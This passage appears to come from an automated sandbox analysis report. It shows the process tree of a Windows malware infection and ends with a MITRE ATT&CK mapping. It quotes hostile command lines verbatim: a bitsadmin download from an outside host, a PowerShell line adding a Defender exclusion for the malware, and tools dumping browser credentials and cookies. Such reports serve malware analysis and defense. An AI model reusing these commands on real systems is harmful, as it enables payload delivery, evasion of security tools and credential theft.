        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m00ibtol.h5y\request2.exe & exit
        5⤵
        
        PID:4228
      - C:\Users\Admin\AppData\Local\Temp\m00ibtol.h5y\request2.exe
        
        C:\Users\Admin\AppData\Local\Temp\m00ibtol.h5y\request2.exe
        6⤵
        Executes dropped EXE
        
        PID:780
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
        
        parse.exe -f json -b firefox
        8⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
        
        parse.exe -f json -b chrome
        8⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5320
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
        
        parse.exe -f json -b edge
        8⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3784
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g2pcf3uk.uzk\SunLabsPlayer.exe /S & exit
        5⤵
        
        PID:1296
      - C:\Users\Admin\AppData\Local\Temp\g2pcf3uk.uzk\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\g2pcf3uk.uzk\SunLabsPlayer.exe /S
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:1496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:5812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:4448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:4344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:3136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:4264
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        Checks for any installed AV software in registry
        
        PID:3636
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        7⤵
        Download via BitsAdmin
        
        PID:3808
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfGNXVQDAS5gsjBB -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:5948
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pqoEjL4JJuJeAe4u -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        
        PID:3840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:4792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:4368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:4224
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:936
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
        7⤵
        Loads dropped DLL
        
        PID:4420
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
        8⤵
        Loads dropped DLL
        Drops file in System32 directory
        
        PID:6052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:1672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:2692
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:5788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:5508
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:368
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h12b2c4c.14d\005.exe & exit
        5⤵
        
        PID:5572
      - C:\Users\Admin\AppData\Local\Temp\h12b2c4c.14d\005.exe
        
        C:\Users\Admin\AppData\Local\Temp\h12b2c4c.14d\005.exe
        6⤵
        Executes dropped EXE
        
        PID:4200
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ibu1syzm.pgu\ifhwwyy.exe & exit
        5⤵
        
        PID:5112
      - C:\Users\Admin\AppData\Local\Temp\ibu1syzm.pgu\ifhwwyy.exe
        
        C:\Users\Admin\AppData\Local\Temp\ibu1syzm.pgu\ifhwwyy.exe
        6⤵
        Executes dropped EXE
        
        PID:4132
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:5660
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:5832
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:5508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nm2l5hcw.ihs\toolspab1.exe & exit
        5⤵
        
        PID:4188
      - C:\Users\Admin\AppData\Local\Temp\nm2l5hcw.ihs\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\nm2l5hcw.ihs\toolspab1.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5744
        
        C:\Users\Admin\AppData\Local\Temp\nm2l5hcw.ihs\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\nm2l5hcw.ihs\toolspab1.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:6112
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ep1arrxd.nbl\GcleanerWW.exe /mixone & exit
        5⤵
        
        PID:5728
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nn1t0u54.not\42a25820.exe & exit
        5⤵
        
        PID:5780
      - C:\Users\Admin\AppData\Local\Temp\nn1t0u54.not\42a25820.exe
        
        C:\Users\Admin\AppData\Local\Temp\nn1t0u54.not\42a25820.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:5988

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
PID:1808
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:4588

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:748

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4224

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4984

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4896
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 56C3F3ED8AD5315A7B63D03330E7EE51 C
  2⤵
  - Loads dropped DLL
  PID:4108
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 1D70CC59202CB23D2AE837085A7688F1
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4468
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:3840
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F53A29FA593D4957E2775EA5BE4B3185 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:5612

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2228

C:\Users\Admin\AppData\Local\Temp\115.exe
C:\Users\Admin\AppData\Local\Temp\115.exe
1⤵
PID:5504

C:\Users\Admin\AppData\Local\Temp\675.exe
C:\Users\Admin\AppData\Local\Temp\675.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5536
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  2⤵
  PID:5184
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  2⤵
  PID:3696

C:\Users\Admin\AppData\Local\Temp\D3D.exe
C:\Users\Admin\AppData\Local\Temp\D3D.exe
1⤵
- Executes dropped EXE
PID:5592
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 736
  2⤵
  - Drops file in Windows directory
  - Program crash
  PID:2732
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 752
  2⤵
  - Program crash
  PID:5036
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 848
  2⤵
  - Program crash
  PID:5004
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 840
  2⤵
  - Program crash
  PID:5732
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 904
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  PID:4188

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5828

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4964

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5672

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5148

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2668

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:6088

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4796

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5868

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5228

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6004

C:\Users\Admin\AppData\Local\Temp\CECD.exe
C:\Users\Admin\AppData\Local\Temp\CECD.exe
1⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:4836
- C:\Users\Admin\AppData\Local\Temp\d0af9913-bdd8-4caf-b929-d1d7b3e14bb2\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\d0af9913-bdd8-4caf-b929-d1d7b3e14bb2\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d0af9913-bdd8-4caf-b929-d1d7b3e14bb2\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  - Executes dropped EXE
  PID:5892
- - C:\Users\Admin\AppData\Local\Temp\d0af9913-bdd8-4caf-b929-d1d7b3e14bb2\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\d0af9913-bdd8-4caf-b929-d1d7b3e14bb2\AdvancedRun.exe" /SpecialRun 4101d8 5892
    3⤵
    - Executes dropped EXE
    PID:5212
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\CECD.exe" -Force
  2⤵
  PID:5616
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 1
  2⤵
  PID:5932
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:2412
- C:\Users\Admin\AppData\Local\Temp\CECD.exe
  "C:\Users\Admin\AppData\Local\Temp\CECD.exe"
  2⤵
  - Executes dropped EXE
  PID:1216
- C:\Users\Admin\AppData\Local\Temp\CECD.exe
  "C:\Users\Admin\AppData\Local\Temp\CECD.exe"
  2⤵
  - Executes dropped EXE
  PID:936
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1624
  2⤵
  - Program crash
  PID:4396

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6080

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5308

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5900

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5812

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:780

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:2720

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery